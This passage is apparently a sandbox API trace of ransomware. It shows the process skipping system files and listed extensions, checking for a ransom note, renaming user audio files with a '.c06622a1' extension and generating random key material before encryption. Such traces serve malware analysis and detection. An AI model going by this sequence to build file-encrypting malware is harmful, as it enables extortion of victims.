lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69a3afd0, ftCreationTime.dwHighDateTime=0x1d5d886, ftLastAccessTime.dwLowDateTime=0xfd6a6fd0, ftLastAccessTime.dwHighDateTime=0x1d5da69, ftLastWriteTime.dwLowDateTime=0xfd6a6fd0, ftLastWriteTime.dwHighDateTime=0x1d5da69, nFileSizeHigh=0x0, nFileSizeLow=0x17a1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HVrtS.m4a", cAlternateFileName="")) returned 1 [0159.949] _wcsicmp (_Str1="HVrtS.m4a", _Str2="README.c06622a1.TXT") returned -10 [0159.949] wcsstr (_Str="HVrtS.m4a", _SubStr="README") returned 0x0 [0159.949] _wcsicmp (_Str1="autorun.inf", _Str2="HVrtS.m4a") returned -7 [0159.949] wcslen (_String="autorun.inf") returned 0xb [0159.949] _wcsicmp (_Str1="boot.ini", _Str2="HVrtS.m4a") returned -6 [0159.949] wcslen (_String="boot.ini") returned 0x8 [0159.949] _wcsicmp (_Str1="bootfont.bin", _Str2="HVrtS.m4a") returned -6 [0159.949] wcslen (_String="bootfont.bin") returned 0xc [0159.949] _wcsicmp (_Str1="bootsect.bak", _Str2="HVrtS.m4a") returned -6 [0159.949] wcslen (_String="bootsect.bak") returned 0xc [0159.949] _wcsicmp (_Str1="desktop.ini", _Str2="HVrtS.m4a") returned -4 [0159.949] wcslen (_String="desktop.ini") returned 0xb [0159.949] _wcsicmp (_Str1="iconcache.db", _Str2="HVrtS.m4a") returned 1 [0159.949] wcslen (_String="iconcache.db") returned 0xc [0159.949] _wcsicmp (_Str1="ntldr", _Str2="HVrtS.m4a") returned 6 [0159.949] wcslen (_String="ntldr") returned 0x5 [0159.949] _wcsicmp (_Str1="ntuser.dat", _Str2="HVrtS.m4a") returned 6 [0159.949] wcslen (_String="ntuser.dat") returned 0xa [0159.949] _wcsicmp (_Str1="ntuser.dat.log", _Str2="HVrtS.m4a") returned 6 [0159.949] wcslen (_String="ntuser.dat.log") returned 0xe [0159.949] _wcsicmp (_Str1="ntuser.ini", _Str2="HVrtS.m4a") returned 6 [0159.949] wcslen (_String="ntuser.ini") returned 0xa [0159.949] _wcsicmp (_Str1="thumbs.db", _Str2="HVrtS.m4a") returned 12 [0159.949] wcslen (_String="thumbs.db") returned 0x9 [0159.949] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0159.949] wcslen (_String="386") returned 0x3 [0159.949] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0159.949] wcslen (_String="adv") returned 0x3 [0159.949] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0159.949] wcslen (_String="ani") returned 0x3 [0159.950] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0159.950] wcslen (_String="bat") returned 0x3 [0159.950] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0159.950] wcslen (_String="bin") returned 0x3 [0159.950] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0159.950] wcslen (_String="cab") returned 0x3 [0159.950] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0159.950] wcslen (_String="cmd") returned 0x3 [0159.950] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0159.950] wcslen (_String="com") returned 0x3 [0159.950] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0159.950] wcslen (_String="cpl") returned 0x3 [0159.950] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0159.950] wcslen (_String="cur") returned 0x3 [0159.950] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0159.950] wcslen (_String="deskthemepack") returned 0xd [0159.950] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0159.950] wcslen (_String="diagcab") returned 0x7 [0159.950] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0159.950] wcslen (_String="diagcfg") returned 0x7 [0159.950] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0159.950] wcslen (_String="diagpkg") returned 0x7 [0159.950] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0159.950] wcslen (_String="dll") returned 0x3 [0159.950] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0159.950] wcslen (_String="drv") returned 0x3 [0159.950] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0159.950] wcslen (_String="exe") returned 0x3 [0159.950] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0159.950] wcslen (_String="hlp") returned 0x3 [0159.950] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0159.950] wcslen (_String="icl") returned 0x3 [0159.950] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0159.950] wcslen (_String="icns") returned 0x4 [0159.950] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0159.950] wcslen (_String="ico") returned 0x3 [0159.950] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0159.951] wcslen (_String="ics") returned 0x3 [0159.951] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0159.951] wcslen (_String="idx") returned 0x3 [0159.951] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0159.951] wcslen (_String="ldf") returned 0x3 [0159.951] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0159.951] wcslen (_String="lnk") returned 0x3 [0159.951] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0159.951] wcslen (_String="mod") returned 0x3 [0159.951] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0159.951] wcslen (_String="mpa") returned 0x3 [0159.951] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0159.951] wcslen (_String="msc") returned 0x3 [0159.951] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0159.951] wcslen (_String="msp") returned 0x3 [0159.951] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0159.951] wcslen (_String="msstyles") returned 0x8 [0159.951] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0159.951] wcslen (_String="msu") returned 0x3 [0159.951] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0159.951] wcslen (_String="nls") returned 0x3 [0159.951] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0159.951] wcslen (_String="nomedia") returned 0x7 [0159.951] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0159.951] wcslen (_String="ocx") returned 0x3 [0159.951] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0159.951] wcslen (_String="prf") returned 0x3 [0159.951] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0159.951] wcslen (_String="ps1") returned 0x3 [0159.951] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0159.951] wcslen (_String="rom") returned 0x3 [0159.951] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0159.951] wcslen (_String="rtp") returned 0x3 [0159.951] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0159.951] wcslen (_String="scr") returned 0x3 [0159.951] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0159.951] wcslen (_String="shs") returned 0x3 [0159.951] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0159.952] wcslen (_String="spl") returned 0x3 [0159.952] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0159.952] wcslen (_String="sys") returned 0x3 [0159.952] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0159.952] wcslen (_String="theme") returned 0x5 [0159.952] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0159.952] wcslen (_String="themepack") returned 0x9 [0159.952] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0159.952] wcslen (_String="wpx") returned 0x3 [0159.952] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0159.952] wcslen (_String="lock") returned 0x4 [0159.952] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0159.952] wcslen (_String="key") returned 0x3 [0159.952] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0159.952] wcslen (_String="hta") returned 0x3 [0159.952] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0159.952] wcslen (_String="msi") returned 0x3 [0159.952] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0159.952] wcslen (_String="pdb") returned 0x3 [0159.952] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0159.952] wcslen (_String="sqlite") returned 0x6 [0159.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg")) returned 0x10 [0159.952] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0159.952] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" [0159.952] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG") returned 0x35 [0159.952] wcscpy (in: _Dest=0x32720e4, _Source="HVrtS.m4a" | out: _Dest="HVrtS.m4a") returned="HVrtS.m4a" [0159.952] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\HVrtS.m4a", dwFileAttributes=0x80) returned 1 [0159.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\HVrtS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\hvrts.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0159.953] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.953] ReadFile (in: hFile=0x1ac, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0159.954] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0xe7e6beea [0159.954] RtlComputeCrc32 (PartialCrc=0xbeea, Buffer=0x32e724, Length=0x80) returned 0xb67e0ae7 [0159.954] RtlComputeCrc32 (PartialCrc=0xae7, Buffer=0x32e724, Length=0x80) returned 0xdfc9be1d [0159.954] RtlComputeCrc32 (PartialCrc=0xbe1d, Buffer=0x32e724, Length=0x80) returned 0x79c91928 [0159.954] RtlComputeCrc32 (PartialCrc=0x1928, Buffer=0x32e724, Length=0x80) returned 0x6570178a [0159.954] CloseHandle (hObject=0x1ac) returned 1 [0159.954] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0159.954] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\HVrtS.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\HVrtS.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\HVrtS.m4a" [0159.954] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\HVrtS.m4a") returned 0x3f [0159.954] wcscpy (in: _Dest=0x32820fe, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.954] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\HVrtS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\hvrts.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\HVrtS.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\hvrts.m4a.c06622a1"), dwFlags=0x8) returned 1 [0159.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\HVrtS.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\hvrts.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ac [0159.957] CreateIoCompletionPort (FileHandle=0x1ac, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.957] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0159.963] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xd219de4 [0159.963] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1c812ece [0159.963] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4825c82 [0159.963] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a97428b [0159.963] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x415d51f3 [0159.963] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x210d6e09 [0159.963] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5a2ac395 [0159.963] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1ae2f6b4 [0159.966] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x3543cd88 [0159.967] RtlComputeCrc32 (PartialCrc=0xcd88, Buffer=0x2690094, Length=0x80) returned 0x198a0336 [0159.967] RtlComputeCrc32 (PartialCrc=0x336, Buffer=0x2690094, Length=0x80) returned 0xa2a151f9 [0159.967] RtlComputeCrc32 (PartialCrc=0x51f9, Buffer=0x2690094, Length=0x80) returned 0x18d9adc9 [0159.967] RtlComputeCrc32 (PartialCrc=0xadc9, Buffer=0x2690094, Length=0x80) returned 0xb8dc7f7b [0159.967] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0159.967] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0159.967] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0159.967] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf81f4b20, ftCreationTime.dwHighDateTime=0x1d5dad4, ftLastAccessTime.dwLowDateTime=0xebc0b7c0, ftLastAccessTime.dwHighDateTime=0x1d5db50, ftLastWriteTime.dwLowDateTime=0xebc0b7c0, ftLastWriteTime.dwHighDateTime=0x1d5db50, nFileSizeHigh=0x0, nFileSizeLow=0x600a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J-iw.wav", cAlternateFileName="")) returned 1 [0159.967] _wcsicmp (_Str1="J-iw.wav", _Str2="README.c06622a1.TXT") returned -8 [0159.967] wcsstr (_Str="J-iw.wav", _SubStr="README") returned 0x0 [0159.967] _wcsicmp (_Str1="autorun.inf", _Str2="J-iw.wav") returned -9 [0159.967] wcslen (_String="autorun.inf") returned 0xb [0159.967] _wcsicmp (_Str1="boot.ini", _Str2="J-iw.wav") returned -8 [0159.967] wcslen (_String="boot.ini") returned 0x8 [0159.967] _wcsicmp (_Str1="bootfont.bin", _Str2="J-iw.wav") returned -8 [0159.967] wcslen (_String="bootfont.bin") returned 0xc [0159.967] _wcsicmp (_Str1="bootsect.bak", _Str2="J-iw.wav") returned -8 [0159.967] wcslen (_String="bootsect.bak") returned 0xc [0159.967] _wcsicmp (_Str1="desktop.ini", _Str2="J-iw.wav") returned -6 [0159.967] wcslen (_String="desktop.ini") returned 0xb [0159.967] _wcsicmp (_Str1="iconcache.db", _Str2="J-iw.wav") returned -1 [0159.967] wcslen (_String="iconcache.db") returned 0xc [0159.967] _wcsicmp (_Str1="ntldr", _Str2="J-iw.wav") returned 4 [0159.967] wcslen (_String="ntldr") returned 0x5 [0159.967] _wcsicmp (_Str1="ntuser.dat", _Str2="J-iw.wav") returned 4 [0159.967] wcslen (_String="ntuser.dat") returned 0xa [0159.967] _wcsicmp (_Str1="ntuser.dat.log", _Str2="J-iw.wav") returned 4 [0159.967] wcslen (_String="ntuser.dat.log") returned 0xe [0159.967] _wcsicmp (_Str1="ntuser.ini", _Str2="J-iw.wav") returned 4 [0159.967] wcslen (_String="ntuser.ini") returned 0xa [0159.967] _wcsicmp (_Str1="thumbs.db", _Str2="J-iw.wav") returned 10 [0159.967] wcslen (_String="thumbs.db") returned 0x9 [0159.968] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0159.968] wcslen (_String="386") returned 0x3 [0159.968] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0159.968] wcslen (_String="adv") returned 0x3 [0159.968] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0159.968] wcslen (_String="ani") returned 0x3 [0159.968] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0159.968] wcslen (_String="bat") returned 0x3 [0159.968] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0159.968] wcslen (_String="bin") returned 0x3 [0159.968] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0159.968] wcslen (_String="cab") returned 0x3 [0159.968] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0159.968] wcslen (_String="cmd") returned 0x3 [0159.968] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0159.968] wcslen (_String="com") returned 0x3 [0159.968] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0159.968] wcslen (_String="cpl") returned 0x3 [0159.968] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0159.968] wcslen (_String="cur") returned 0x3 [0159.968] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0159.968] wcslen (_String="deskthemepack") returned 0xd [0159.968] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0159.968] wcslen (_String="diagcab") returned 0x7 [0159.968] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0159.968] wcslen (_String="diagcfg") returned 0x7 [0159.968] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0159.968] wcslen (_String="diagpkg") returned 0x7 [0159.968] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0159.968] wcslen (_String="dll") returned 0x3 [0159.968] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0159.968] wcslen (_String="drv") returned 0x3 [0159.968] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0159.968] wcslen (_String="exe") returned 0x3 [0159.969] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0159.969] wcslen (_String="hlp") returned 0x3 [0159.969] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0159.969] wcslen (_String="icl") returned 0x3 [0159.969] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0159.969] wcslen (_String="icns") returned 0x4 [0159.969] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0159.969] wcslen (_String="ico") returned 0x3 [0159.969] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0159.969] wcslen (_String="ics") returned 0x3 [0159.969] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0159.969] wcslen (_String="idx") returned 0x3 [0159.969] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0159.969] wcslen (_String="ldf") returned 0x3 [0159.969] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0159.969] wcslen (_String="lnk") returned 0x3 [0159.969] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0159.969] wcslen (_String="mod") returned 0x3 [0159.969] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0159.969] wcslen (_String="mpa") returned 0x3 [0159.969] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0159.969] wcslen (_String="msc") returned 0x3 [0159.969] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0159.969] wcslen (_String="msp") returned 0x3 [0159.969] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0159.969] wcslen (_String="msstyles") returned 0x8 [0159.969] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0159.969] wcslen (_String="msu") returned 0x3 [0159.969] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0159.969] wcslen (_String="nls") returned 0x3 [0159.969] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0159.969] wcslen (_String="nomedia") returned 0x7 [0159.969] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0159.969] wcslen (_String="ocx") returned 0x3 [0159.969] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0159.969] wcslen (_String="prf") returned 0x3 [0159.969] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0159.970] wcslen (_String="ps1") returned 0x3 [0159.970] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0159.970] wcslen (_String="rom") returned 0x3 [0159.970] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0159.970] wcslen (_String="rtp") returned 0x3 [0159.970] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0159.970] wcslen (_String="scr") returned 0x3 [0159.970] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0159.970] wcslen (_String="shs") returned 0x3 [0159.970] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0159.970] wcslen (_String="spl") returned 0x3 [0159.970] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0159.970] wcslen (_String="sys") returned 0x3 [0159.970] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0159.970] wcslen (_String="theme") returned 0x5 [0159.970] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0159.970] wcslen (_String="themepack") returned 0x9 [0159.970] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0159.970] wcslen (_String="wpx") returned 0x3 [0159.970] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0159.970] wcslen (_String="lock") returned 0x4 [0159.970] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0159.970] wcslen (_String="key") returned 0x3 [0159.970] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0159.970] wcslen (_String="hta") returned 0x3 [0159.970] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0159.970] wcslen (_String="msi") returned 0x3 [0159.970] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0159.970] wcslen (_String="pdb") returned 0x3 [0159.970] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0159.970] wcslen (_String="sqlite") returned 0x6 [0159.970] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg")) returned 0x10 [0159.971] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0159.971] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG" [0159.971] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG") returned 0x35 [0159.971] wcscpy (in: _Dest=0x32720e4, _Source="J-iw.wav" | out: _Dest="J-iw.wav") returned="J-iw.wav" [0159.971] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\J-iw.wav", dwFileAttributes=0x80) returned 1 [0159.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\J-iw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\j-iw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0159.971] SetFilePointerEx (in: hFile=0x1d4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.971] ReadFile (in: hFile=0x1d4, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0159.972] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0x889958b5 [0159.972] RtlComputeCrc32 (PartialCrc=0x58b5, Buffer=0x32e724, Length=0x80) returned 0x10ef65fe [0159.972] RtlComputeCrc32 (PartialCrc=0x65fe, Buffer=0x32e724, Length=0x80) returned 0xc7cbd743 [0159.972] RtlComputeCrc32 (PartialCrc=0xd743, Buffer=0x32e724, Length=0x80) returned 0x9139dccc [0159.972] RtlComputeCrc32 (PartialCrc=0xdccc, Buffer=0x32e724, Length=0x80) returned 0x5f330f07 [0159.972] CloseHandle (hObject=0x1d4) returned 1 [0159.973] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0159.973] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\J-iw.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\J-iw.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\J-iw.wav" [0159.973] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\J-iw.wav") returned 0x3e [0159.973] wcscpy (in: _Dest=0x32820fc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.973] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\J-iw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\j-iw.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\J-iw.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\j-iw.wav.c06622a1"), dwFlags=0x8) returned 1 [0159.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\J-iw.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\j-iw.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d4 [0159.975] CreateIoCompletionPort (FileHandle=0x1d4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.975] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0159.981] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5aa2c726 [0159.982] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x208dff0b [0159.982] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1c0573af [0159.982] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x137f40fc [0159.982] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6668057a [0159.982] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1448482e [0159.982] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x229f8a13 [0159.982] RtlRandomEx (in: Seed=0xcb1018 | out: 